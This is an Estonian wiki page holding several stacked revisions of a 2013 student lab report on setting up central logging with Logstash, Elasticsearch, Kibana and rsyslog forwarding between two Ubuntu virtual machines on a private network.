'''Punktide''' (5p) '''kirja saamiseks''' on vajalik share-i olemasolu, mis on ligipääsetav ning kirjutatav (võimalik luua kataloogi) ainult lab gruppi kuuluvatele kasutajatele ning lab gruppi mitte kuuluvad kasutajad ei tohi sinna ligi pääseda.
Lisaks peavad kasutajad pääsema ligi oma kodukaustale, sõltumata sellest, kas ta kuulub lab gruppi või mitte.

'''Labor 1'''
*Veebiserver ja virtualhostid
*DNS
*e-post
*iptables
*samba

'''Labor 2'''
*LDAP või Samba4 - LDAP Teet Saar, Kullo-Kalev Aru
*Puppet või chef
*PAM
*Puppet (Ubuntus) - Kristo Kapten
*[[Samba(windows domeenis fileserver)]] - Marko Kurs
*[[TLS termineerimine nginx abil]] - Sander Arnus, Sander Saveli

Linuxi administreerimine - Labor 2 (keskse logihalduse rakendamine) protokoll

2013-11-28T11:38:50Z

Saus: /* Rsyslog */

Labor 2 protokoll - keskse logihalduse rakendamine

Sten Aus

A32

28.11.2013

Õppeaine ja ülesanne: [[Linuxi administreerimine#Keskne_logiserver]]

= Ülesande püstitus =
Luua kohalikus võrgus kahes virtuaalmasinas keskne logihaldus. Üks masin on logiserver ja teine klient, mis saadab oma logid sinna.

Server: Ubuntu Server 64bit, versioon: 12.04.3 LTS

Klient: Ubuntu client 64bit, versioon 12.04.3 LTS

Abimaterjal - väljavõte Sander Arnus lõputööst [http://enos.itcollege.ee/~mernits/Linux%20administreerimine/Arnus%20-%20keskne%20logilahendus.pdf|"Keskse logilahenduse rakendamine Hariduse Infotehnoologia Sihtasutuses"] ja selle IT Kolledži wiki materjal [[Keskse logilahenduse rakendamine]].

= Kasutatud tarkvara =
Logstash versioon 1.1.12 - logiserver, mis võtab vastu ja töötleb logisid

Elasticsearch versioon 0.90.0 - logide talletamiseks

Kibana 0.2.0 - veebiliides logide sirvimiseks ja otsimiseks

''NB! Kasutasin samu versioone, mis on kasutanud S. Arnus, kuna Kibana versioon 3 (version 3 milestone 4) on totaalselt teistsugune varasematest ja lahendus selle versiooniga ei töötanud.''

= Protokoll =

== Serveri seadistamine ==
Uus virtuaalmasin nimega LA-logiserver-64 (kasutatud varem eksporditud masinat IT Kolledži elab keskkonnast).

Omistasin masinale staatilise ip 192.168.56.210 (kuna kasutusel on ka teine server (puppet), mille aadress on juba 192.168.56.200). Selleks muutsin /etc/network/interfaces failis ip aadressi eth1 võrgukaardi jaoks.

/etc/hostname failis asendasin masina nimeks '"logimassin"'. Koos domeeninimega on masina nimi "logimassin.planet.zz" (FQDN).

=== Logstash ===
Kasutatud S. Arnus lahendust

<source lang="bash">
apt-get install openjdk-7-jre
mkdir /etc/logstash

wget https://logstash.objects.dreamhost.com/release/logstash-1.1.12-flatjar.jar
mv logstash-1.1.12-flatjar.jar /etc/logstash/logstash.jar
</source>

Loon konfiguratsioonifaili /etc/logstash/logstash.conf sisuga:
NB! Eemaldasin windowsi ja RELP protokollide logid, kuna neid ei ole antud laboris kasutatud.

<source lang="bash">
input {
#Linux/Unix süsteemidest tulevad logid
tcp {
type => "syslog-tcp"
port => 10514
}
#Logiserveri enda logid
file {
type => "logserver"
path => [ "/var/log/syslog", "/var/log/*.log" ]
}
}

output {
#Saadetakse andmebaasi
elasticsearch {
}
}

</source>

Loon automaatse käivituse jaoks kirje ''upstart''i

<source lang="bash">
nano /etc/init/logstash-server.conf
</source>

Ja faili sisu:

<source lang="bash">
# logstash server instance
description "logstash server instance"

start on virtual-filesystems
stop on runlevel [06]

respawn
respawn limit 5 30
limit nofile 65550 65550

env HOME=/etc/logstash
chdir /etc/logstash
setuid logstash
setgid adm
console log

#Minimaalne ja maksimaalne javale lubatud mälumaht
#env JAVA_OPTS='-Xms512m -Xmx512m'

script
exec java -jar /etc/logstash/logstash.jar agent -f /etc/logstash/logstash.conf
end script
</source>

Loon kausta /var/log/logstash ja kasutaja nimega logstash, lisan ta gruppi adm.

<source lang="bash">
mkdir /var/log/logstash
adduser --system --disabled-password --no-create-home --group --quiet logstash
usermod -a -G adm logstash
</source>

Muudan vajalike kaustade omanikuks kasutaja nimega "logstash" ja grupi "adm"

<source lang="bash">
chown -R logstash:adm /etc/logstash/
chown -R logstash:adm /var/log/logstash/
</source>

=== Elasticsearch ===
Laen internetist alla elasticsearchi binaarse paki, pakin selle lahti (installeerin) ja eemaldan faili.

<source lang="bash">
wget https://download.elasticsearch.org/elasticsearch/elasticsearch/elasticsearch-0.90.0.deb
dpkg -i elasticsearch-0.90.0.deb
rm elasticsearch-0.90.0.deb
</source>

Teenuse käivitamine

<source lang="bash">
service elasticsearch start
</source>

=== Kibana ===
Installeerin sõltuvused ja tõmban internetist pakitud kibana arhiivi.

<source lang="bash">
apt-get install ruby1.9.3 rubygems

wget https://github.com/rashidkpc/Kibana/archive/v0.2.0.tar.gz
tar -zxf v0.2.0.tar.gz
mv Kibana-0.2.0/ /etc/kibana
rm v0.2.0.tar.gz
cd /etc/kibana
gem install bundler
bundle install
</source>

Muudan faili /etc/kibana/KibanaConfig.rb ja seal sees leiduvat "KibanaHost" stringi. Stringi on vaja kirjutada masina IP-aadress, et pääseks ligi veebiserveriga Kibana kasutajakeskkonnale.

<source lang="bash">
KibanaHost = ‘192.168.56.210’
</source>

Loon upstarti kirje kibana automaatseks käivitamiseks

<source lang="bash">
nano /etc/init/kibana.conf
</source>

Faili sisu:

<source lang="bash">
# kibana.conf# kibana - log viewer
description "Kibana logstash viewer"

start on virtual-filesystems
stop on runlevel [06]

respawn
respawn limit 5 30
limit nofile 65550 65550

# Environment
env HOME=/etc/kibana/
chdir /etc/kibana
setuid logstash
setgid adm
console log

# Run Kibana, which is in /etc/kibana
script
ruby /etc/kibana/kibana.rb
end script

</source>

Töö lõppu üks korralik taaskäivitus ja olen serveri seadistamisega jõudnud lõpuni.

== Kliendi seadistamine ==
Kliendiks Ubuntu client 64bit. Kasutusel sama klient, mis samas aines puppeti laboris kliendina.

=== Rsyslog ===
Rsyslog on Linux/UNIX masina jaoks logiklient, mis saadab logisid edasi seadistatud serverile. Kui rsyslogi seadistatud poleks, saab seda teha kasutades käsku

<source lang="bash">
apt-get install rsyslog
</source>

Muudan kliendis rsyslogi konfiguratsioonifaili

<source lang="bash">
nano /etc/rsyslog.conf
</source>

Lisasin TCP kommentaaride juurde rea, mis saadab üle TCP protokolli logid määratud ip-aadressi suunas.

<source lang="bash">
*.* @@192.168.56.210:10514
</source>

Seletused:

<nowiki>*</nowiki>.* kõik logifailid

@@ - kasutades TCP protokolli (@ - UDP protokoll) - miks kasutada TCP-d? Kuna TCP on kindlam ja turvalisem, ei lase andmekaol tekkida.

192.168.56.210 - "logimassin" serveri ip-aadress

10514 - logide saatmise ja vastuvõtmise port

Kliendil on vaja rsyslogi jaoks teha taaskäivitus. Seda saab teha kas masinat taaskäivitades või kasutades käsku

<source lang="bash">
service rsyslog restart
</source>

= Ligipääs ja testimine =
Veebiliidesest on võimalik keskkond avada, kui trükkida sisse aadress http://192.168.56.210:5601. Mina aga lisasin kliendi masina hosts faili kirje

<source lang="bash">
192.168.56.210 logimassin.planet.zz logimassin
</source>

Avades liidese näen nii serverist (logimassin) kui ka kliendist (client) tulnud logisid. Et asja illustreerida enda jaoks veelgi, panin käima serveri (puppet) ja läbi Kibana veebiliidese lugesin välja, mis kliendi logifailis tekkis, kui puppet saatis sinna mingeid uuendusi.

Linuxi administreerimine - Labor 2 (keskse logihalduse rakendamine) protokoll

2013-11-28T11:36:55Z

Saus: /* Logstash */

Labor 2 protokoll - keskse logihalduse rakendamine

Sten Aus

A32

28.11.2013

Õppeaine ja ülesanne: [[Linuxi administreerimine#Keskne_logiserver]]

= Ülesande püstitus =
Luua kohalikus võrgus kahes virtuaalmasinas keskne logihaldus. Üks masin on logiserver ja teine klient, mis saadab oma logid sinna.

Server: Ubuntu Server 64bit, versioon: 12.04.3 LTS

Klient: Ubuntu client 64bit, versioon 12.04.3 LTS

Abimaterjal - väljavõte Sander Arnus lõputööst [http://enos.itcollege.ee/~mernits/Linux%20administreerimine/Arnus%20-%20keskne%20logilahendus.pdf|"Keskse logilahenduse rakendamine Hariduse Infotehnoologia Sihtasutuses"] ja selle IT Kolledži wiki materjal [[Keskse logilahenduse rakendamine]].

= Kasutatud tarkvara =
Logstash versioon 1.1.12 - logiserver, mis võtab vastu ja töötleb logisid

Elasticsearch versioon 0.90.0 - logide talletamiseks

Kibana 0.2.0 - veebiliides logide sirvimiseks ja otsimiseks

''NB! Kasutasin samu versioone, mis on kasutanud S. Arnus, kuna Kibana versioon 3 (version 3 milestone 4) on totaalselt teistsugune varasematest ja lahendus selle versiooniga ei töötanud.''

= Protokoll =

== Serveri seadistamine ==
Uus virtuaalmasin nimega LA-logiserver-64 (kasutatud varem eksporditud masinat IT Kolledži elab keskkonnast).

Omistasin masinale staatilise ip 192.168.56.210 (kuna kasutusel on ka teine server (puppet), mille aadress on juba 192.168.56.200). Selleks muutsin /etc/network/interfaces failis ip aadressi eth1 võrgukaardi jaoks.

/etc/hostname failis asendasin masina nimeks '"logimassin"'. Koos domeeninimega on masina nimi "logimassin.planet.zz" (FQDN).

=== Logstash ===
Kasutatud S. Arnus lahendust

<source lang="bash">
apt-get install openjdk-7-jre
mkdir /etc/logstash

wget https://logstash.objects.dreamhost.com/release/logstash-1.1.12-flatjar.jar
mv logstash-1.1.12-flatjar.jar /etc/logstash/logstash.jar
</source>

Loon konfiguratsioonifaili /etc/logstash/logstash.conf sisuga:
NB! Eemaldasin windowsi ja RELP protokollide logid, kuna neid ei ole antud laboris kasutatud.

<source lang="bash">
input {
#Linux/Unix süsteemidest tulevad logid
tcp {
type => "syslog-tcp"
port => 10514
}
#Logiserveri enda logid
file {
type => "logserver"
path => [ "/var/log/syslog", "/var/log/*.log" ]
}
}

output {
#Saadetakse andmebaasi
elasticsearch {
}
}

</source>

Loon automaatse käivituse jaoks kirje ''upstart''i

<source lang="bash">
nano /etc/init/logstash-server.conf
</source>

Ja faili sisu:

<source lang="bash">
# logstash server instance
description "logstash server instance"

start on virtual-filesystems
stop on runlevel [06]

respawn
respawn limit 5 30
limit nofile 65550 65550

env HOME=/etc/logstash
chdir /etc/logstash
setuid logstash
setgid adm
console log

#Minimaalne ja maksimaalne javale lubatud mälumaht
#env JAVA_OPTS='-Xms512m -Xmx512m'

script
exec java -jar /etc/logstash/logstash.jar agent -f /etc/logstash/logstash.conf
end script
</source>

Loon kausta /var/log/logstash ja kasutaja nimega logstash, lisan ta gruppi adm.

<source lang="bash">
mkdir /var/log/logstash
adduser --system --disabled-password --no-create-home --group --quiet logstash
usermod -a -G adm logstash
</source>

Muudan vajalike kaustade omanikuks kasutaja nimega "logstash" ja grupi "adm"

<source lang="bash">
chown -R logstash:adm /etc/logstash/
chown -R logstash:adm /var/log/logstash/
</source>

=== Elasticsearch ===
Laen internetist alla elasticsearchi binaarse paki, pakin selle lahti (installeerin) ja eemaldan faili.

<source lang="bash">
wget https://download.elasticsearch.org/elasticsearch/elasticsearch/elasticsearch-0.90.0.deb
dpkg -i elasticsearch-0.90.0.deb
rm elasticsearch-0.90.0.deb
</source>

Teenuse käivitamine

<source lang="bash">
service elasticsearch start
</source>

=== Kibana ===
Installeerin sõltuvused ja tõmban internetist pakitud kibana arhiivi.

<source lang="bash">
apt-get install ruby1.9.3 rubygems

wget https://github.com/rashidkpc/Kibana/archive/v0.2.0.tar.gz
tar -zxf v0.2.0.tar.gz
mv Kibana-0.2.0/ /etc/kibana
rm v0.2.0.tar.gz
cd /etc/kibana
gem install bundler
bundle install
</source>

Muudan faili /etc/kibana/KibanaConfig.rb ja seal sees leiduvat "KibanaHost" stringi. Stringi on vaja kirjutada masina IP-aadress, et pääseks ligi veebiserveriga Kibana kasutajakeskkonnale.

<source lang="bash">
KibanaHost = ‘192.168.56.210’
</source>

Loon upstarti kirje kibana automaatseks käivitamiseks

<source lang="bash">
nano /etc/init/kibana.conf
</source>

Faili sisu:

<source lang="bash">
# kibana.conf# kibana - log viewer
description "Kibana logstash viewer"

start on virtual-filesystems
stop on runlevel [06]

respawn
respawn limit 5 30
limit nofile 65550 65550

# Environment
env HOME=/etc/kibana/
chdir /etc/kibana
setuid logstash
setgid adm
console log

# Run Kibana, which is in /etc/kibana
script
ruby /etc/kibana/kibana.rb
end script

</source>

Töö lõppu üks korralik taaskäivitus ja olen serveri seadistamisega jõudnud lõpuni.

== Kliendi seadistamine ==
Kliendiks Ubuntu client 64bit. Kasutusel sama klient, mis samas aines puppeti laboris kliendina.

=== Rsyslog ===
Rsyslog on Linux/UNIX masina jaoks logiklient, mis saadab logisid edasi seadistatud serverile. Kui rsyslogi seadistatud poleks, saab seda teha kasutades käsku

<source lang="bash">
apt-get install rsyslog
</source>

Muudan kliendis rsyslogi konfiguratsioonifaili

<source lang="bash">
nano /etc/rsyslog.conf
</source>

Lisasin TCP kommentaaride juurde rea, mis saadab üle TCP protokolli logid määratud ip-aadressi suunas.

<source lang="bash">
*.* @@192.168.56.210:10514
</source>

Seletused:

*.* kõik logifailid

@@ - kasutades TCP protokolli (@ - UDP protokoll) - miks kasutada TCP-d? Kuna TCP on kindlam ja turvalisem, ei lase andmekaol tekkida.

192.168.56.210 - "logimassin" serveri ip-aadress

10514 - logide saatmise ja vastuvõtmise port

Kliendil on vaja rsyslogi jaoks teha taaskäivitus. Seda saab teha kas masinat taaskäivitades või kasutades käsku

<source lang="bash">
service rsyslog restart
</source>

= Ligipääs ja testimine =
Veebiliidesest on võimalik keskkond avada, kui trükkida sisse aadress http://192.168.56.210:5601. Mina aga lisasin kliendi masina hosts faili kirje

<source lang="bash">
192.168.56.210 logimassin.planet.zz logimassin
</source>

Avades liidese näen nii serverist (logimassin) kui ka kliendist (client) tulnud logisid. Et asja illustreerida enda jaoks veelgi, panin käima serveri (puppet) ja läbi Kibana veebiliidese lugesin välja, mis kliendi logifailis tekkis, kui puppet saatis sinna mingeid uuendusi.

Linuxi administreerimine - Labor 2 (keskse logihalduse rakendamine) protokoll

2013-11-28T11:36:28Z

Saus: /* Logstash */

Labor 2 protokoll - keskse logihalduse rakendamine

Sten Aus

A32

28.11.2013

Õppeaine ja ülesanne: [[Linuxi administreerimine#Keskne_logiserver]]

= Ülesande püstitus =
Luua kohalikus võrgus kahes virtuaalmasinas keskne logihaldus. Üks masin on logiserver ja teine klient, mis saadab oma logid sinna.

Server: Ubuntu Server 64bit, versioon: 12.04.3 LTS

Klient: Ubuntu client 64bit, versioon 12.04.3 LTS

Abimaterjal - väljavõte Sander Arnus lõputööst [http://enos.itcollege.ee/~mernits/Linux%20administreerimine/Arnus%20-%20keskne%20logilahendus.pdf|"Keskse logilahenduse rakendamine Hariduse Infotehnoologia Sihtasutuses"] ja selle IT Kolledži wiki materjal [[Keskse logilahenduse rakendamine]].

= Kasutatud tarkvara =
Logstash versioon 1.1.12 - logiserver, mis võtab vastu ja töötleb logisid

Elasticsearch versioon 0.90.0 - logide talletamiseks

Kibana 0.2.0 - veebiliides logide sirvimiseks ja otsimiseks

''NB! Kasutasin samu versioone, mis on kasutanud S. Arnus, kuna Kibana versioon 3 (version 3 milestone 4) on totaalselt teistsugune varasematest ja lahendus selle versiooniga ei töötanud.''

= Protokoll =

== Serveri seadistamine ==
Uus virtuaalmasin nimega LA-logiserver-64 (kasutatud varem eksporditud masinat IT Kolledži elab keskkonnast).

Omistasin masinale staatilise ip 192.168.56.210 (kuna kasutusel on ka teine server (puppet), mille aadress on juba 192.168.56.200). Selleks muutsin /etc/network/interfaces failis ip aadressi eth1 võrgukaardi jaoks.

/etc/hostname failis asendasin masina nimeks '"logimassin"'. Koos domeeninimega on masina nimi "logimassin.planet.zz" (FQDN).

=== Logstash ===
Kasutatud S. Arnus lahendust

<source lang="bash">
apt-get install openjdk-7-jre
mkdir /etc/logstash

wget https://logstash.objects.dreamhost.com/release/logstash-1.1.12-flatjar.jar
mv logstash-1.1.12-flatjar.jar /etc/logstash/logstash.jar
</source>

Loon konfiguratsioonifaili /etc/logstash/logstash.conf sisuga:
NB! Eemaldasin windowsi ja RELP protokollide logid, kuna neid ei ole antud laboris kasutatud.

<source lang="bash">
input {
#Linux/Unix süsteemidest tulevad logid
tcp {
type => "syslog-tcp"
port => 10514
}
#Logiserveri enda logid
file {
type => "logserver"
path => [ "/var/log/syslog", "/var/log/*.log" ]
}
}

output {
#Saadetakse andmebaasi
elasticsearch {
}
}

</source>

Loon automaatse käivituse jaoks kirje ''upstart''i

<source lang="bash">
nano /etc/init/logstash-server.conf
</source>

Ja faili sisu:

<source lang="bash">
# logstash server instance
description "logstash server instance"

start on virtual-filesystems
stop on runlevel [06]

respawn
respawn limit 5 30
limit nofile 65550 65550

env HOME=/etc/logstash
chdir /etc/logstash
setuid logstash
setgid adm
console log

#Minimaalne ja maksimaalne javale lubatud mälumaht
#env JAVA_OPTS='-Xms512m -Xmx512m'

script
exec java -jar /etc/logstash/logstash.jar agent -f /etc/logstash/logstash.conf
end script
</source>

Loon kausta /var/log/logstash ja kasutaja nimega logstash, lisan ta gruppi adm.

<source lang="bash">
mkdir /var/log/logstash
adduser --system --disabled-password --no-create-home --group --quiet logstash
usermod -a -G adm logstash
</source>

Muudan vajalike kaustade omanikuks kasutaja nimega "logstash" ja grupi "adm"

<source="bash">
chown -R logstash:adm /etc/logstash/
chown -R logstash:adm /var/log/logstash/
</source>

=== Elasticsearch ===
Laen internetist alla elasticsearchi binaarse paki, pakin selle lahti (installeerin) ja eemaldan faili.

<source lang="bash">
wget https://download.elasticsearch.org/elasticsearch/elasticsearch/elasticsearch-0.90.0.deb
dpkg -i elasticsearch-0.90.0.deb
rm elasticsearch-0.90.0.deb
</source>

Teenuse käivitamine

<source lang="bash">
service elasticsearch start
</source>

=== Kibana ===
Installeerin sõltuvused ja tõmban internetist pakitud kibana arhiivi.

<source lang="bash">
apt-get install ruby1.9.3 rubygems

wget https://github.com/rashidkpc/Kibana/archive/v0.2.0.tar.gz
tar -zxf v0.2.0.tar.gz
mv Kibana-0.2.0/ /etc/kibana
rm v0.2.0.tar.gz
cd /etc/kibana
gem install bundler
bundle install
</source>

Muudan faili /etc/kibana/KibanaConfig.rb ja seal sees leiduvat "KibanaHost" stringi. Stringi on vaja kirjutada masina IP-aadress, et pääseks ligi veebiserveriga Kibana kasutajakeskkonnale.

<source lang="bash">
KibanaHost = ‘192.168.56.210’
</source>

Loon upstarti kirje kibana automaatseks käivitamiseks

<source lang="bash">
nano /etc/init/kibana.conf
</source>

Faili sisu:

<source lang="bash">
# kibana.conf# kibana - log viewer
description "Kibana logstash viewer"

start on virtual-filesystems
stop on runlevel [06]

respawn
respawn limit 5 30
limit nofile 65550 65550

# Environment
env HOME=/etc/kibana/
chdir /etc/kibana
setuid logstash
setgid adm
console log

# Run Kibana, which is in /etc/kibana
script
ruby /etc/kibana/kibana.rb
end script

</source>

Töö lõppu üks korralik taaskäivitus ja olen serveri seadistamisega jõudnud lõpuni.

== Kliendi seadistamine ==
Kliendiks Ubuntu client 64bit. Kasutusel sama klient, mis samas aines puppeti laboris kliendina.

=== Rsyslog ===
Rsyslog on Linux/UNIX masina jaoks logiklient, mis saadab logisid edasi seadistatud serverile. Kui rsyslogi seadistatud poleks, saab seda teha kasutades käsku

<source lang="bash">
apt-get install rsyslog
</source>

Muudan kliendis rsyslogi konfiguratsioonifaili

<source lang="bash">
nano /etc/rsyslog.conf
</source>

Lisasin TCP kommentaaride juurde rea, mis saadab üle TCP protokolli logid määratud ip-aadressi suunas.

<source lang="bash">
*.* @@192.168.56.210:10514
</source>

Seletused:

*.* kõik logifailid

@@ - kasutades TCP protokolli (@ - UDP protokoll) - miks kasutada TCP-d? Kuna TCP on kindlam ja turvalisem, ei lase andmekaol tekkida.

192.168.56.210 - "logimassin" serveri ip-aadress

10514 - logide saatmise ja vastuvõtmise port

Kliendil on vaja rsyslogi jaoks teha taaskäivitus. Seda saab teha kas masinat taaskäivitades või kasutades käsku

<source lang="bash">
service rsyslog restart
</source>

= Ligipääs ja testimine =
Veebiliidesest on võimalik keskkond avada, kui trükkida sisse aadress http://192.168.56.210:5601. Mina aga lisasin kliendi masina hosts faili kirje

<source lang="bash">
192.168.56.210 logimassin.planet.zz logimassin
</source>

Avades liidese näen nii serverist (logimassin) kui ka kliendist (client) tulnud logisid. Et asja illustreerida enda jaoks veelgi, panin käima serveri (puppet) ja läbi Kibana veebiliidese lugesin välja, mis kliendi logifailis tekkis, kui puppet saatis sinna mingeid uuendusi.

Linuxi administreerimine - Labor 2 (keskse logihalduse rakendamine) protokoll

2013-11-28T11:34:50Z

Saus: /* Kasutatud tarkvara */

Labor 2 protokoll - keskse logihalduse rakendamine

Sten Aus

A32

28.11.2013

Õppeaine ja ülesanne: [[Linuxi administreerimine#Keskne_logiserver]]

= Ülesande püstitus =
Luua kohalikus võrgus kahes virtuaalmasinas keskne logihaldus. Üks masin on logiserver ja teine klient, mis saadab oma logid sinna.

Server: Ubuntu Server 64bit, versioon: 12.04.3 LTS

Klient: Ubuntu client 64bit, versioon 12.04.3 LTS

Abimaterjal - väljavõte Sander Arnus lõputööst [http://enos.itcollege.ee/~mernits/Linux%20administreerimine/Arnus%20-%20keskne%20logilahendus.pdf|"Keskse logilahenduse rakendamine Hariduse Infotehnoologia Sihtasutuses"] ja selle IT Kolledži wiki materjal [[Keskse logilahenduse rakendamine]].

= Kasutatud tarkvara =
Logstash versioon 1.1.12 - logiserver, mis võtab vastu ja töötleb logisid

Elasticsearch versioon 0.90.0 - logide talletamiseks

Kibana 0.2.0 - veebiliides logide sirvimiseks ja otsimiseks

''NB! Kasutasin samu versioone, mis on kasutanud S. Arnus, kuna Kibana versioon 3 (version 3 milestone 4) on totaalselt teistsugune varasematest ja lahendus selle versiooniga ei töötanud.''

= Protokoll =

== Serveri seadistamine ==
Uus virtuaalmasin nimega LA-logiserver-64 (kasutatud varem eksporditud masinat IT Kolledži elab keskkonnast).

Omistasin masinale staatilise ip 192.168.56.210 (kuna kasutusel on ka teine server (puppet), mille aadress on juba 192.168.56.200). Selleks muutsin /etc/network/interfaces failis ip aadressi eth1 võrgukaardi jaoks.

/etc/hostname failis asendasin masina nimeks '"logimassin"'. Koos domeeninimega on masina nimi "logimassin.planet.zz" (FQDN).

=== Logstash ===
Kasutatud S. Arnus lahendust

<source lang="bash">
apt-get install openjdk-7-jre
mkdir /etc/logstash

wget https://logstash.objects.dreamhost.com/release/logstash-1.1.12-flatjar.jar
mv logstash-1.1.12-flatjar.jar /etc/logstash/logstash.jar
</source>

Loon konfiguratsioonifaili /etc/logstash/logstash.conf sisuga:
NB! Eemaldasin windowsi ja RELP protokollide logid, kuna neid ei ole antud laboris kasutatud.

<source lang="bash">
input {
#Linux/Unix süsteemidest tulevad logid
tcp {
type => "syslog-tcp"
port => 10514
}
#Logiserveri enda logid
file {
type => "logserver"
path => [ "/var/log/syslog", "/var/log/*.log" ]
}
}

output {
#Saadetakse andmebaasi
elasticsearch {
}
}

</source>

Loon automaatse käivituse jaoks kirje ''upstart''i

<source lang="bash">
nano /etc/init/logstash-server.conf
</source>

<source lang="bash">
# logstash server instance
description "logstash server instance"

start on virtual-filesystems
stop on runlevel [06]

respawn
respawn limit 5 30
limit nofile 65550 65550

env HOME=/etc/logstash
chdir /etc/logstash
setuid logstash
setgid adm
console log

#Minimaalne ja maksimaalne javale lubatud mälumaht
#env JAVA_OPTS='-Xms512m -Xmx512m'

script
exec java -jar /etc/logstash/logstash.jar agent -f /etc/logstash/logstash.conf
end script
</source>

Loon kausta /var/log/logstash ja kasutaja nimega logstash

<source lang="bash">
mkdir /var/log/logstash
adduser --system --disabled-password --no-create-home --group --quiet logstash
usermod -a -G adm logstash
</source>

Muudan vajalike kaustade omanikuks kasutaja nimega "logstash" ja grupi "adm"

<source="bash">
chown -R logstash:adm /etc/logstash/
chown -R logstash:adm /var/log/logstash/
</source>

=== Elasticsearch ===
Laen internetist alla elasticsearchi binaarse paki, pakin selle lahti (installeerin) ja eemaldan faili.

<source lang="bash">
wget https://download.elasticsearch.org/elasticsearch/elasticsearch/elasticsearch-0.90.0.deb
dpkg -i elasticsearch-0.90.0.deb
rm elasticsearch-0.90.0.deb
</source>

Teenuse käivitamine

<source lang="bash">
service elasticsearch start
</source>

=== Kibana ===
Installeerin sõltuvused ja tõmban internetist pakitud kibana arhiivi.

<source lang="bash">
apt-get install ruby1.9.3 rubygems

wget https://github.com/rashidkpc/Kibana/archive/v0.2.0.tar.gz
tar -zxf v0.2.0.tar.gz
mv Kibana-0.2.0/ /etc/kibana
rm v0.2.0.tar.gz
cd /etc/kibana
gem install bundler
bundle install
</source>

Muudan faili /etc/kibana/KibanaConfig.rb ja seal sees leiduvat "KibanaHost" stringi. Stringi on vaja kirjutada masina IP-aadress, et pääseks ligi veebiserveriga Kibana kasutajakeskkonnale.

<source lang="bash">
KibanaHost = ‘192.168.56.210’
</source>

Loon upstarti kirje kibana automaatseks käivitamiseks

<source lang="bash">
nano /etc/init/kibana.conf
</source>

Faili sisu:

<source lang="bash">
# kibana.conf# kibana - log viewer
description "Kibana logstash viewer"

start on virtual-filesystems
stop on runlevel [06]

respawn
respawn limit 5 30
limit nofile 65550 65550

# Environment
env HOME=/etc/kibana/
chdir /etc/kibana
setuid logstash
setgid adm
console log

# Run Kibana, which is in /etc/kibana
script
ruby /etc/kibana/kibana.rb
end script

</source>

Töö lõppu üks korralik taaskäivitus ja olen serveri seadistamisega jõudnud lõpuni.

== Kliendi seadistamine ==
Kliendiks Ubuntu client 64bit. Kasutusel sama klient, mis samas aines puppeti laboris kliendina.

=== Rsyslog ===
Rsyslog on Linux/UNIX masina jaoks logiklient, mis saadab logisid edasi seadistatud serverile. Kui rsyslogi seadistatud poleks, saab seda teha kasutades käsku

<source lang="bash">
apt-get install rsyslog
</source>

Muudan kliendis rsyslogi konfiguratsioonifaili

<source lang="bash">
nano /etc/rsyslog.conf
</source>

Lisasin TCP kommentaaride juurde rea, mis saadab üle TCP protokolli logid määratud ip-aadressi suunas.

<source lang="bash">
*.* @@192.168.56.210:10514
</source>

Seletused:

*.* kõik logifailid

@@ - kasutades TCP protokolli (@ - UDP protokoll) - miks kasutada TCP-d? Kuna TCP on kindlam ja turvalisem, ei lase andmekaol tekkida.

192.168.56.210 - "logimassin" serveri ip-aadress

10514 - logide saatmise ja vastuvõtmise port

Kliendil on vaja rsyslogi jaoks teha taaskäivitus. Seda saab teha kas masinat taaskäivitades või kasutades käsku

<source lang="bash">
service rsyslog restart
</source>

= Ligipääs ja testimine =
Veebiliidesest on võimalik keskkond avada, kui trükkida sisse aadress http://192.168.56.210:5601. Mina aga lisasin kliendi masina hosts faili kirje

<source lang="bash">
192.168.56.210 logimassin.planet.zz logimassin
</source>

Avades liidese näen nii serverist (logimassin) kui ka kliendist (client) tulnud logisid. Et asja illustreerida enda jaoks veelgi, panin käima serveri (puppet) ja läbi Kibana veebiliidese lugesin välja, mis kliendi logifailis tekkis, kui puppet saatis sinna mingeid uuendusi.

Linuxi administreerimine - Labor 2 (keskse logihalduse rakendamine) protokoll

2013-11-28T11:32:17Z

Saus: /* Ülesande püstitus */

Labor 2 protokoll - keskse logihalduse rakendamine

Sten Aus

A32

28.11.2013

Õppeaine ja ülesanne: [[Linuxi administreerimine#Keskne_logiserver]]

= Ülesande püstitus =
Luua kohalikus võrgus kahes virtuaalmasinas keskne logihaldus. Üks masin on logiserver ja teine klient, mis saadab oma logid sinna.

Server: Ubuntu Server 64bit, versioon: 12.04.3 LTS

Klient: Ubuntu client 64bit, versioon 12.04.3 LTS

Abimaterjal - väljavõte Sander Arnus lõputööst [http://enos.itcollege.ee/~mernits/Linux%20administreerimine/Arnus%20-%20keskne%20logilahendus.pdf|"Keskse logilahenduse rakendamine Hariduse Infotehnoologia Sihtasutuses"] ja selle IT Kolledži wiki materjal [[Keskse logilahenduse rakendamine]].

= Kasutatud tarkvara =
Logstash, elasticsearch, kibana

Kasutasin samu versioone, mis on kasutanud S. Arnus, kuna kibana versioon 3 on totaalselt teistsugune varasematest ja lahendus selle versiooniga ei töötanud.

= Protokoll =

== Serveri seadistamine ==
Uus virtuaalmasin nimega LA-logiserver-64 (kasutatud varem eksporditud masinat IT Kolledži elab keskkonnast).

Omistasin masinale staatilise ip 192.168.56.210 (kuna kasutusel on ka teine server (puppet), mille aadress on juba 192.168.56.200). Selleks muutsin /etc/network/interfaces failis ip aadressi eth1 võrgukaardi jaoks.

/etc/hostname failis asendasin masina nimeks '"logimassin"'. Koos domeeninimega on masina nimi "logimassin.planet.zz" (FQDN).

=== Logstash ===
Kasutatud S. Arnus lahendust

<source lang="bash">
apt-get install openjdk-7-jre
mkdir /etc/logstash

wget https://logstash.objects.dreamhost.com/release/logstash-1.1.12-flatjar.jar
mv logstash-1.1.12-flatjar.jar /etc/logstash/logstash.jar
</source>

Loon konfiguratsioonifaili /etc/logstash/logstash.conf sisuga:
NB! Eemaldasin windowsi ja RELP protokollide logid, kuna neid ei ole antud laboris kasutatud.

<source lang="bash">
input {
#Linux/Unix süsteemidest tulevad logid
tcp {
type => "syslog-tcp"
port => 10514
}
#Logiserveri enda logid
file {
type => "logserver"
path => [ "/var/log/syslog", "/var/log/*.log" ]
}
}

output {
#Saadetakse andmebaasi
elasticsearch {
}
}

</source>

Loon automaatse käivituse jaoks kirje ''upstart''i

<source lang="bash">
nano /etc/init/logstash-server.conf
</source>

<source lang="bash">
# logstash server instance
description "logstash server instance"

start on virtual-filesystems
stop on runlevel [06]

respawn
respawn limit 5 30
limit nofile 65550 65550

env HOME=/etc/logstash
chdir /etc/logstash
setuid logstash
setgid adm
console log

#Minimaalne ja maksimaalne javale lubatud mälumaht
#env JAVA_OPTS='-Xms512m -Xmx512m'

script
